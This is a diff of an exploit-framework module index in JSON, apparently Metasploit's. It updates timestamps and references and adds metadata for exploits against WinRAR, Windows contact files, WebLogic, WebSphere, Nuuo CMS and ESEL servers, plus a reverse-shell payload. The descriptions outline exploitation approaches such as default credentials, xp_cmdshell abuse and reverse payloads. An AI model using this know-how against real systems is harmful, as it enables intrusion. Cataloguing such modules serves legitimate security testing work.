+      "URL-https://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt"
    ],
    "platform": "Windows",
    "arch": "",
@@ -86452,7 +88579,7 @@
      "Automatic",
      "Internet Explorer on Windows"
    ],
-    "mod_time": "2017-09-09 09:52:08 +0000",
+    "mod_time": "2019-05-23 07:03:23 +0000",
    "path": "/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ms10_022_ie_vbscript_winhlp32",
@@ -86519,7 +88646,6 @@
    "references": [
      "CVE-2010-1885",
      "OSVDB-65264",
-      "URL-http://www.microsoft.com/technet/security/advisory/2219475.mspx",
      "MSB-MS10-042"
    ],
    "platform": "Windows",
@@ -86534,7 +88660,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ms10_042_helpctr_xss_cmd_exec",
@@ -86559,8 +88685,7 @@
    "references": [
      "CVE-2010-2568",
      "OSVDB-66387",
-      "MSB-MS10-046",
-      "URL-http://www.microsoft.com/technet/security/advisory/2286198.mspx"
+      "MSB-MS10-046"
    ],
    "platform": "Windows",
    "arch": "",
@@ -86574,7 +88699,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ms10_046_shortcut_icon_dllloader",
@@ -86601,7 +88726,6 @@
      "CVE-2010-3962",
      "OSVDB-68987",
      "BID-44536",
-      "URL-http://www.microsoft.com/technet/security/advisory/2458511.mspx",
      "EDB-15421",
      "MSB-MS10-090"
    ],
@@ -86620,7 +88744,7 @@
      "Internet Explorer 6",
      "Internet Explorer 7"
    ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ms10_090_ie_css_clip",
@@ -86646,7 +88770,6 @@
      "CVE-2010-3971",
      "OSVDB-69796",
      "BID-45246",
-      "URL-http://www.microsoft.com/technet/security/advisory/2488013.mspx",
      "URL-http://www.wooyun.org/bugs/wooyun-2010-0885",
      "URL-https://seclists.org/fulldisclosure/2010/Dec/110",
      "MSB-MS11-003"
@@ -86667,7 +88790,7 @@
      "Internet Explorer 6",
      "Debug Target (Crash)"
    ],
-    "mod_time": "2018-10-02 15:57:57 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/exploits/windows/browser/ms11_003_ie_css_import.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ms11_003_ie_css_import",
@@ -87390,7 +89513,7 @@
      "Windows XP",
      "Windows 7"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-16 21:06:47 +0000",
    "path": "/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ms14_064_ole_code_execution",
@@ -87453,8 +89576,7 @@
      "OSVDB-55651",
      "BID-35558",
      "MSB-MS09-032",
-      "MSB-MS09-037",
-      "URL-http://www.microsoft.com/technet/security/advisory/972890.mspx"
+      "MSB-MS09-037"
    ],
    "platform": "Windows",
    "arch": "",
@@ -87468,7 +89590,7 @@
    "targets": [
      "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/exploits/windows/browser/msvidctl_mpeg2.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/msvidctl_mpeg2",
@@ -90373,8 +92495,7 @@
    "references": [
      "CVE-2007-1748",
      "OSVDB-34100",
-      "MSB-MS07-029",
-      "URL-http://www.microsoft.com/technet/security/advisory/935964.mspx"
+      "MSB-MS07-029"
    ],
    "platform": "Windows",
    "arch": "",
@@ -90398,7 +92519,7 @@
      "Windows 2003 Server SP1-SP2 Italian",
      "Windows 2003 Server SP1-SP2 German"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb",
    "is_install_path": true,
    "ref_name": "windows/dcerpc/ms07_029_msdns_zonename",
@@ -90461,8 +92582,7 @@
      "CVE-2007-0038",
      "CVE-2007-1765",
      "OSVDB-33629",
-      "BID-23194",
-      "URL-http://www.microsoft.com/technet/security/advisory/935423.mspx"
+      "BID-23194"
    ],
    "platform": "Windows",
    "arch": "",
@@ -90493,7 +92613,7 @@
      "Windows XP SP1a userenv.dll English",
      "Windows XP SP1a shell32.dll English"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb",
    "is_install_path": true,
    "ref_name": "windows/email/ms07_017_ani_loadimage_chunksize",
@@ -94648,6 +96768,44 @@
    "notes": {
    }
  },
+  "exploit_windows/fileformat/microsoft_windows_contact": {
+    "name": "Microsoft Windows Contact File Format Arbitary Code Execution",
+    "full_name": "exploit/windows/fileformat/microsoft_windows_contact",
+    "rank": 300,
+    "disclosure_date": "2019-01-17",
+    "type": "exploit",
+    "author": [
+      "John Page (aka hyp3rlinx)",
+      "Brenner Little"
+    ],
+    "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.\n        User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of \".contact\" files <c:Url> node param which takes an expected website value, however if an attacker references an\n        executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.\n        Executable files can live in a sub-directory so when the \".contact\" website link is clicked it traverses directories towards the executable and runs.\n        Making matters worse is if the the files are compressed then downloaded \"mark of the web\" (MOTW) may potentially not work as expected with certain archive utilitys.\n        The \".\\\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.\n        This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.",
+    "references": [
+      "EDB-46188",
+      "URL-http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt",
+      "ZDI-19-013"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows"
+    ],
+    "mod_time": "2019-04-10 17:17:50 +0000",
+    "path": "/modules/exploits/windows/fileformat/microsoft_windows_contact.rb",
+    "is_install_path": true,
+    "ref_name": "windows/fileformat/microsoft_windows_contact",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_windows/fileformat/millenium_mp3_pls": {
    "name": "Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow",
    "full_name": "exploit/windows/fileformat/millenium_mp3_pls",
@@ -95108,8 +97266,7 @@
      "CVE-2010-3970",
      "OSVDB-70263",
      "MSB-MS11-006",
-      "BID-45662",
-      "URL-http://www.microsoft.com/technet/security/advisory/2490606.mspx"
+      "BID-45662"
    ],
    "platform": "Windows",
    "arch": "",
@@ -95126,7 +97283,7 @@
      "Windows XP SP3 English",
      "Crash Target for Debugging"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms11_006_createsizeddibsection",
@@ -97559,6 +99716,47 @@
    "notes": {
    }
  },
+  "exploit_windows/fileformat/winrar_ace": {
+    "name": "RARLAB WinRAR ACE Format Input Validation Remote Code Execution",
+    "full_name": "exploit/windows/fileformat/winrar_ace",
+    "rank": 600,
+    "disclosure_date": "2019-02-05",
+    "type": "exploit",
+    "author": [
+      "Nadav Grossman",
+      "Imran E. Dawoodjee <imrandawoodjee.infosec@gmail.com>"
+    ],
+    "description": "In WinRAR versions prior to and including 5.61, there is path traversal vulnerability\n        when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename\n        field is manipulated with specific patterns, the destination (extraction) folder is\n        ignored, thus treating the filename as an absolute path. This module will attempt to\n        extract a payload to the startup folder of the current user. It is limited such that\n        we can only go back one folder. Therefore, for this exploit to work properly, the user\n        must extract the supplied RAR file from one folder within the user profile folder\n        (e.g. Desktop or Downloads). User restart is required to gain a shell.",
+    "references": [
+      "CVE-2018-20250",
+      "EDB-46552",
+      "BID-106948",
+      "URL-https://research.checkpoint.com/extracting-code-execution-from-winrar/",
+      "URL-https://apidoc.roe.ch/acefile/latest/",
+      "URL-http://www.hugi.scene.org/online/coding/hugi%2012%20-%20coace.htm"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "RARLAB WinRAR <= 5.61"
+    ],
+    "mod_time": "2019-04-24 05:43:28 +0000",
+    "path": "/modules/exploits/windows/fileformat/winrar_ace.rb",
+    "is_install_path": true,
+    "ref_name": "windows/fileformat/winrar_ace",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_windows/fileformat/winrar_name_spoofing": {
    "name": "WinRAR Filename Spoofing",
    "full_name": "exploit/windows/fileformat/winrar_name_spoofing",
@@ -100354,11 +102552,13 @@
    "disclosure_date": "2014-06-19",
    "type": "exploit",
    "author": [
-      "Nicholas Nam <nick@executionflow.org>"
+      "Nicholas Nam <nick@executionflow.org>",
+      "Imran E. Dawoodjee <imrandawoodjee.infosec@gmail.com>"
    ],
-    "description": "This module exploits the embedded Lua interpreter in the admin web interface for\n        versions 4.3.8 and below. When supplying a specially crafted HTTP POST request\n        an attacker can use os.execute() to execute arbitrary system commands on\n        the target with SYSTEM privileges.",
+    "description": "This module exploits the embedded Lua interpreter in the admin web interface for\n        versions 3.0.0 and above. When supplying a specially crafted HTTP POST request\n        an attacker can use os.execute() to execute arbitrary system commands on\n        the target with SYSTEM privileges.",
    "references": [
-      "URL-http://www.wftpserver.com"
+      "URL-http://www.wftpserver.com",
+      "URL-https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -100379,9 +102579,9 @@
      "https"
    ],
    "targets": [
-      "Windows VBS Stager"
+      "Wing FTP Server >= 3.0.0"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-02-10 14:26:13 +0000",
    "path": "/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/wing_ftp_admin_exec",
@@ -105981,6 +108181,60 @@
    "notes": {
    }
  },
+  "exploit_windows/http/oats_weblogic_console": {
+    "name": "Oracle Application Testing Suite WebLogic Server Administration Console War Deployment",
+    "full_name": "exploit/windows/http/oats_weblogic_console",
+    "rank": 600,
+    "disclosure_date": "2019-03-13",
+    "type": "exploit",
+    "author": [
+      "Steven Seeley",
+      "sinn3r <sinn3r@metasploit.com>"
+    ],
+    "description": "This module abuses a feature in WebLogic Server's Administration Console to install\n        a malicious Java application in order to gain remote code execution. Authentication\n        is required, however by default, Oracle ships with a \"oats\" account that you could\n        log in with, which grants you administrator access.",
+    "references": [
+
+    ],
+    "platform": "Java",
+    "arch": "java",
+    "rport": 8088,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "WebLogic Server Administration Console 12 or prior"
+    ],
+    "mod_time": "2019-05-24 10:06:47 +0000",
+    "path": "/modules/exploits/windows/http/oats_weblogic_console.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/oats_weblogic_console",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    }
+  },
  "exploit_windows/http/octopusdeploy_deploy": {
    "name": "Octopus Deploy Authenticated Code Execution",
    "full_name": "exploit/windows/http/octopusdeploy_deploy",
@@ -106015,7 +108269,7 @@
    "targets": [
      "Windows Powershell"
    ],
-    "mod_time": "2018-08-20 18:08:19 +0000",
+    "mod_time": "2019-03-29 18:14:56 +0000",
    "path": "/modules/exploits/windows/http/octopusdeploy_deploy.rb",
    "is_install_path": true,
    "ref_name": "windows/http/octopusdeploy_deploy",
@@ -108101,6 +110355,43 @@
    "notes": {
    }
  },
+  "exploit_windows/ibm/ibm_was_dmgr_java_deserialization_rce": {
+    "name": "IBM Websphere Application Server Network Deployment Untrusted Data Deserialization Remote Code Execution",
+    "full_name": "exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce",
+    "rank": 600,
+    "disclosure_date": "2019-05-15",
+    "type": "exploit",
+    "author": [
+      "b0yd"
+    ],
+    "description": "This module exploits untrusted serialized data processed by the WAS DMGR Server and Cells.\n        NOTE: There is a required 2 minute timeout between attempts as the neighbor being added must be reset.",
+    "references": [
+      "CVE-2019-8352",
+      "URL-https://www-01.ibm.com/support/docview.wss?uid=ibm10883628"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": 11006,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows Binary",
+      "CMD"
+    ],
+    "mod_time": "2019-05-30 13:36:28 +0000",
+    "path": "/modules/exploits/windows/ibm/ibm_was_dmgr_java_deserialization_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/ibm/ibm_was_dmgr_java_deserialization_rce",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_windows/iis/iis_webdav_scstoragepathfromurl": {
    "name": " Microsoft IIS WebDav ScStoragePathFromUrl Overflow",
    "full_name": "exploit/windows/iis/iis_webdav_scstoragepathfromurl",
@@ -108161,7 +110452,7 @@
    "name": "Microsoft IIS WebDAV Write Access Code Execution",
    "full_name": "exploit/windows/iis/iis_webdav_upload_asp",
    "rank": 600,
-    "disclosure_date": "1994-01-01",
+    "disclosure_date": "2004-12-31",
    "type": "exploit",
    "author": [
      "hdm <x@hdm.io>"
@@ -108192,7 +110483,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-22 09:05:56 +0000",
    "path": "/modules/exploits/windows/iis/iis_webdav_upload_asp.rb",
    "is_install_path": true,
    "ref_name": "windows/iis/iis_webdav_upload_asp",
@@ -110294,7 +112585,7 @@
      "Windows x64",
      "Windows x86"
    ],
-    "mod_time": "2018-10-27 20:54:14 +0000",
+    "mod_time": "2019-05-31 17:44:35 +0000",
    "path": "/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb",
    "is_install_path": true,
    "ref_name": "windows/local/cve_2017_8464_lnk_lpe",
@@ -111645,7 +113936,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2018-12-17 07:00:23 +0000",
+    "mod_time": "2019-05-31 17:44:35 +0000",
    "path": "/modules/exploits/windows/local/persistence_service.rb",
    "is_install_path": true,
    "ref_name": "windows/local/persistence_service",
@@ -111798,7 +114089,7 @@
    "targets": [
      "Universal"
    ],
-    "mod_time": "2017-09-27 07:41:06 +0000",
+    "mod_time": "2019-05-31 17:44:35 +0000",
    "path": "/modules/exploits/windows/local/ps_persist.rb",
    "is_install_path": true,
    "ref_name": "windows/local/ps_persist",
@@ -111948,7 +114239,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-29 18:14:56 +0000",
    "path": "/modules/exploits/windows/local/registry_persistence.rb",
    "is_install_path": true,
    "ref_name": "windows/local/registry_persistence",
@@ -112280,7 +114571,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-29 18:14:56 +0000",
    "path": "/modules/exploits/windows/local/wmi.rb",
    "is_install_path": true,
    "ref_name": "windows/local/wmi",
@@ -112778,6 +115069,41 @@
    "notes": {
    }
  },
+  "exploit_windows/misc/ais_esel_server_rce": {
+    "name": "AIS logistics ESEL-Server Unauth SQL Injection RCE",
+    "full_name": "exploit/windows/misc/ais_esel_server_rce",
+    "rank": 600,
+    "disclosure_date": "2019-03-27",
+    "type": "exploit",
+    "author": [
+      "Manuel Feifel"
+    ],
+    "description": "This module will execute an arbitrary payload on an \"ESEL\" server used by the\n        AIS logistic software. The server typically listens on port 5099 without TLS.\n        There could also be server listening on 5100 with TLS but the port 5099 is\n        usually always open.\n        The login process is vulnerable to an SQL Injection. Usually a MSSQL Server\n        with the 'sa' user is in place.\n\n        This module was verified on version 67 but it should also run on lower versions.\n        An fixed version was created by AIS in September 2017. However most systems\n        have not been updated.\n\n        In regard to the payload, unless there is a closed port in the web server,\n        you dont want to use any \"bind\" payload. You want a \"reverse\" payload,\n        probably to your port 80 or to any other outbound port allowed on the firewall.\n\n        Currently, one delivery method is supported\n\n        This method takes advantage of the Command Stager subsystem. This allows using\n        various techniques, such as using a TFTP server, to send the executable. By default\n        the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n        NOTE: This module will leave a payload executable on the target system when the\n        attack is finished.",
+    "references": [
+      "CVE-2019-10123"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": 5099,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2019-04-25 18:24:26 +0000",
+    "path": "/modules/exploits/windows/misc/ais_esel_server_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/misc/ais_esel_server_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_windows/misc/allmediaserver_bof": {
    "name": "ALLMediaServer 0.8 Buffer Overflow",
    "full_name": "exploit/windows/misc/allmediaserver_bof",
@@ -116731,7 +119057,7 @@
    "targets": [
      "Win32 Universal (Generic DEP & ASLR Bypass)"
    ],
-    "mod_time": "2018-09-17 22:23:54 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/exploits/windows/misc/wireshark_packet_dect.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/wireshark_packet_dect",
@@ -117867,6 +120193,85 @@
    "notes": {
    }
  },
+  "exploit_windows/nuuo/nuuo_cms_fu": {
+    "name": "Nuuo Central Management Server Authenticated Arbitrary File Upload",
+    "full_name": "exploit/windows/nuuo/nuuo_cms_fu",
+    "rank": 0,
+    "disclosure_date": "2018-10-11",
+    "type": "exploit",
+    "author": [
+      "Pedro Ribeiro <pedrib@gmail.com>"
+    ],
+    "description": "The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the\n      CMS Server.\n      The vulnerability is in the \"FileName\" parameter, which accepts directory traversal (..\\..\\)\n      characters. Therefore, this function can be abused to overwrite any files in the installation\n      drive of CMS Server.\n\n      This vulnerability is exploitable in CMS versions up to and including v2.4.\n\n      This module will either use a provided session number (which can be guessed with an auxiliary\n      module) or attempt to login using a provided username and password - it will also try the\n      default credentials if nothing is provided.\n\n      This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module\n      fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will\n      not execute successfully.",
+    "references": [
+      "CVE-2018-17936",
+      "URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02",
+      "URL-https://seclists.org/fulldisclosure/2019/Jan/51",
+      "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt"
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": 5180,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Nuuo Central Management Server <= v2.4.0"
+    ],
+    "mod_time": "2019-04-23 06:28:57 +0000",
+    "path": "/modules/exploits/windows/nuuo/nuuo_cms_fu.rb",
+    "is_install_path": true,
+    "ref_name": "windows/nuuo/nuuo_cms_fu",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
+  "exploit_windows/nuuo/nuuo_cms_sqli": {
+    "name": "Nuuo Central Management Authenticated SQL Server SQLi",
+    "full_name": "exploit/windows/nuuo/nuuo_cms_sqli",
+    "rank": 300,
+    "disclosure_date": "2018-10-11",
+    "type": "exploit",
+    "author": [
+      "Pedro Ribeiro <pedrib@gmail.com>"
+    ],
+    "description": "The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.\n      This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is\n      installed by default, xp_cmdshell can be enabled and abused to achieve code execution.\n      This module will either use a provided session number (which can be guessed with an auxiliary\n      module) or attempt to login using a provided username and password - it will also try the\n      default credentials if nothing is provided.",
+    "references": [
+      "CVE-2018-18982",
+      "URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02",
+      "URL-https://seclists.org/fulldisclosure/2019/Jan/51",
+      "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt"
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": 5180,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Nuuo Central Management Server <= v2.10.0"
+    ],
+    "mod_time": "2019-04-23 06:29:51 +0000",
+    "path": "/modules/exploits/windows/nuuo/nuuo_cms_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "windows/nuuo/nuuo_cms_sqli",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    }
+  },
  "exploit_windows/oracle/client_system_analyzer_upload": {
    "name": "Oracle Database Client System Analyzer Arbitrary File Upload",
    "full_name": "exploit/windows/oracle/client_system_analyzer_upload",
@@ -120426,8 +122831,7 @@
    "references": [
      "CVE-2007-1748",
      "OSVDB-34100",
-      "MSB-MS07-029",
-      "URL-http://www.microsoft.com/technet/security/advisory/935964.mspx"
+      "MSB-MS07-029"
    ],
    "platform": "Windows",
    "arch": "",
@@ -120453,7 +122857,7 @@
      "Windows 2003 Server SP1-SP2 Italian",
      "Windows 2003 Server SP1-SP2 German"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms07_029_msdns_zonename",
@@ -120595,8 +122999,7 @@
      "CVE-2009-3103",
      "BID-36299",
      "OSVDB-57799",
-      "URL-https://seclists.org/fulldisclosure/2009/Sep/0039.html",
-      "URL-http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx"
+      "URL-https://seclists.org/fulldisclosure/2009/Sep/0039.html"
    ],
    "platform": "Windows",
    "arch": "",
@@ -120612,7 +123015,7 @@
    "targets": [
      "Windows Vista SP1/SP2 and Server 2008 (x86)"
    ],
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms09_050_smb2_negotiate_func_index",
@@ -120638,7 +123041,6 @@
      "CVE-2010-2568",
      "OSVDB-66387",
      "MSB-MS10-046",
-      "URL-http://www.microsoft.com/technet/security/advisory/2286198.mspx",
      "URL-https://github.com/rapid7/metasploit-framework/pull/4911"
    ],
    "platform": "Windows",
@@ -120653,7 +123055,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-23 07:01:21 +0000",
    "path": "/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms10_046_shortcut_icon_dllloader",
@@ -120778,11 +123180,11 @@
    "targets": [
      "Windows 7 and Server 2008 R2 (x64) All Service Packs"
    ],
-    "mod_time": "2018-11-05 17:16:16 +0000",
+    "mod_time": "2019-05-22 17:16:06 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_eternalblue",
-    "check": false,
+    "check": true,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -120879,11 +123281,11 @@
      "Native upload",
      "MOF upload"
    ],
-    "mod_time": "2019-01-16 11:23:21 +0000",
+    "mod_time": "2019-05-22 20:05:44 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_psexec.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_psexec",
-    "check": false,
+    "check": true,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -121051,7 +123453,7 @@
      "DLL",
      "PSH"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-29 18:14:56 +0000",
    "path": "/modules/exploits/windows/smb/smb_delivery.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/smb_delivery",
@@ -123307,7 +125709,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_http",
@@ -123338,7 +125740,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_https",
@@ -123369,7 +125771,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-06 22:32:24 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_tcp",
@@ -123429,7 +125831,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-07 09:33:36 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_http",
@@ -123460,7 +125862,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-07 09:33:36 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_https",
@@ -123491,7 +125893,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-02-07 09:33:36 +0000",
+    "mod_time": "2019-05-21 12:40:27 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_tcp",
@@ -124377,7 +126779,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-04-30 12:15:47 +0000",
    "path": "/modules/payloads/singles/cmd/mainframe/apf_privesc_jcl.rb",
    "is_install_path": true,
    "ref_name": "cmd/mainframe/apf_privesc_jcl",
@@ -125120,6 +127522,36 @@
    "notes": {
    }
  },
+  "payload_cmd/unix/reverse_bash_udp": {
+    "name": "Unix Command Shell, Reverse UDP (/dev/udp)",
+    "full_name": "payload/cmd/unix/reverse_bash_udp",
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "hdm <x@hdm.io>",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "Creates an interactive shell via bash's builtin /dev/udp.\n\n        This will not work on circa 2009 and older Debian-based Linux\n        distributions (including Ubuntu) because they compile bash\n        without the /dev/udp feature.",
+    "references": [
+
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-05-24 16:33:44 +0000",
+    "path": "/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/unix/reverse_bash_udp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "payload_cmd/unix/reverse_ksh": {
    "name": "Unix Command Shell, Reverse TCP (via Ksh)",
    "full_name": "payload/cmd/unix/reverse_ksh",
@@ -125933,7 +128365,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
